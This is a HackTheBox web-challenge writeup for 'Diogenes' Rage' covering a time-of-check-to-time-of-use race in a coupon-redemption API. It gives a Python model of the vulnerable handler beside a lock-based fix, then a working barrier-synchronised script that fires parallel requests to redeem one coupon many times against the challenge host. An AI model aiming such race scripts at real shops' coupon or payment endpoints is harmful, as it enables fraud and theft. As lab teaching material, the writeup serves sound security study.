HackTheBox Writeup - Challenges - Diogenes' Rage

🕒 2025/04/29

  • Category: Web
  • Difficulty: Easy
  • IP: 83.136.252.199:57508

1. Website

What you can do:

  1. Apply a coupon: each coupon credits $1 to the account balance, which can then be spent on items.
    POST /api/coupons/apply
    image
  2. Enter the code of the item you want to buy; the purchase goes through if the balance covers its price.
    POST /api/purchase
    image image

2. Source Code

  • routes/index.js
    • POST /api/coupons/apply
      image
      Note that this handler is asynchronous: the check that the coupon has not already been used and the update that records it as used are not performed atomically, which is the window exploited in section 4.

    • POST /api/purchase
      image

      • Lines 31-34: purchasing item C8 returns the flag.
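To make that window concrete, here is an added Python model of the handler's logic. It is not the challenge's routes/index.js (which the page only shows as a screenshot): it reproduces the pattern the writeup points at, an async check-then-act with an await between the check and the update, raced against itself, beside a version that serialises both steps under a lock. The Store class, the apply_coupon_* names and the coupon string are made up for the example, and asyncio.sleep(0) stands in for the database round-trip.

```python
"""Model of the coupon handler's check-then-act race (constructed example).

This is not the challenge's routes/index.js. It models the pattern the
writeup points at: an async handler that checks whether a coupon has been
used, awaits a database round-trip, and only then records it as used and
credits the balance. Store, apply_coupon_* and the coupon code are made up.
"""
import asyncio
from dataclasses import dataclass, field

COUPON_VALUE = 1  # each coupon is worth $1, as in the challenge


@dataclass
class Store:
    balance: int = 0
    used_coupons: set = field(default_factory=set)
    lock: asyncio.Lock = field(default_factory=asyncio.Lock)  # used by the fix only


async def db_roundtrip():
    # Stand-in for the await on the database inside the real handler. Yielding
    # to the event loop here is what lets other requests run between the check
    # and the update.
    await asyncio.sleep(0)


async def apply_coupon_vulnerable(store, coupon):
    """Check, await, then act: the TOCTOU window is the await."""
    if coupon in store.used_coupons:     # time of check
        return False
    await db_roundtrip()                 # concurrent requests run here
    store.used_coupons.add(coupon)       # time of use
    store.balance += COUPON_VALUE
    return True


async def apply_coupon_fixed(store, coupon):
    """Check and update under one lock, so a coupon can be redeemed once."""
    async with store.lock:
        if coupon in store.used_coupons:
            return False
        await db_roundtrip()
        store.used_coupons.add(coupon)
        store.balance += COUPON_VALUE
        return True


async def _race(handler, parallel):
    # Build the store inside the running loop so the lock binds to it.
    store = Store()
    accepted = await asyncio.gather(
        *(handler(store, "COUPON-1") for _ in range(parallel))
    )
    return store.balance, sum(accepted)


def redeem_count(handler, parallel=10):
    """Apply the same coupon `parallel` times at once; return the final balance."""
    balance, _ = asyncio.run(_race(handler, parallel))
    return balance


if __name__ == "__main__":
    print("vulnerable handler balance:", redeem_count(apply_coupon_vulnerable))  # 10
    print("fixed handler balance:     ", redeem_count(apply_coupon_fixed))       # 1
```

With ten concurrent applications of one coupon, every task passes the `used_coupons` check before any of them resumes from the await, so the vulnerable handler credits $10 for a $1 coupon; the locked version credits $1 and rejects the other nine. In a real service the equivalent of the lock is an atomic conditional update in the database (for example a single UPDATE that only succeeds when the coupon is still unused), not in-process state.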

3. Burp Suite

  • POST /api/coupons/apply HTTP/1.1
    image

  • POST /api/purchase HTTP/1.1
    image


4. TOCTOU Race Condition

A Time-Of-Check-To-Time-Of-Use (TOCTOU) race condition exists in the coupon handler: it checks whether a coupon has already been used and only later records that it has. If two or more requests applying the same coupon arrive in parallel, each passes the check before any of them has marked the coupon as used, so the same coupon is credited several times.

Attack Path:

  1. Grab a session cookie from a captured request (any session will do; here it is taken from the intercepted POST /api/purchase).

    • POST /api/purchase HTTP/1.1
      image
  2. Send many POST /api/coupons/apply requests in parallel with that cookie. They arrive inside the TOCTOU window, so the same coupon is redeemed once per accepted request and the balance grows accordingly.

    • exp.py
      image
    • python3 exp.py
      image
  3. With the balance now large enough, purchase item C8; its response contains the flag.

    • Flag
      image
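The racing script (exp.py above) is only shown as a screenshot, so here is an added stand-in for it, not the writeup's code, using the standard library only: N threads each prepare a POST /api/coupons/apply carrying the session cookie, block on a barrier, and fire together so the requests land inside the handler's check-then-act window. The target and endpoint come from the writeup; the cookie value, the JSON field name `coupon_code`, the coupon string and the assumption that HTTP 200 means an accepted redemption are placeholders to be filled in from the request captured in Burp.

```python
"""Race POST /api/coupons/apply with one session cookie (constructed example).

Not the writeup's exp.py. The endpoint and target come from the writeup; the
cookie value, the JSON field name "coupon_code", the coupon string and the
"200 means accepted" check are assumptions to adjust from the Burp capture.
"""
import json
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

TARGET = "http://83.136.252.199:57508"               # challenge instance from the writeup
COOKIE = "session=REPLACE_WITH_YOUR_SESSION_COOKIE"  # assumption: cookie name and value
COUPON = "REPLACE_WITH_COUPON_CODE"                  # assumption: the coupon the app issues


def build_request(target, cookie, coupon):
    """One POST /api/coupons/apply carrying the session cookie."""
    body = json.dumps({"coupon_code": coupon}).encode()  # field name is an assumption
    return urllib.request.Request(
        f"{target}/api/coupons/apply",
        data=body,
        method="POST",
        headers={"Content-Type": "application/json", "Cookie": cookie},
    )


def http_send(req):
    """Send one request; return (status, body) even for 4xx/5xx responses."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def race_apply(send, make_request, parallel=20):
    """Fire `parallel` identical requests at the same instant.

    Each worker builds its request first, then blocks on a barrier; the barrier
    releases all workers together so the requests reach the server within the
    handler's check-then-act window. `send` is injected so the racing logic can
    be exercised without a live target. Results are in submission order.
    """
    barrier = threading.Barrier(parallel)

    def worker(_):
        req = make_request()      # prepared before the barrier: no work after release
        barrier.wait()            # everyone waits here, then all fire at once
        return send(req)

    with ThreadPoolExecutor(max_workers=parallel) as pool:
        return list(pool.map(worker, range(parallel)))


def count_accepted(results, ok_status=200):
    """Number of responses the server accepted (assumption: accepted == HTTP 200)."""
    return sum(1 for status, _ in results if status == ok_status)


if __name__ == "__main__":
    results = race_apply(http_send, lambda: build_request(TARGET, COOKIE, COUPON))
    print(f"{count_accepted(results)}/{len(results)} coupon applications accepted")
    # More than one accepted means the balance now covers item C8.
```

Run it once with the cookie and coupon filled in, then re-check the balance in the browser and repeat until it covers item C8. The barrier matters more than raw thread count: twenty requests released within the same few milliseconds hit the window far more reliably than a hundred sent in a loop, and keeping request construction before the barrier removes any per-thread work between release and send.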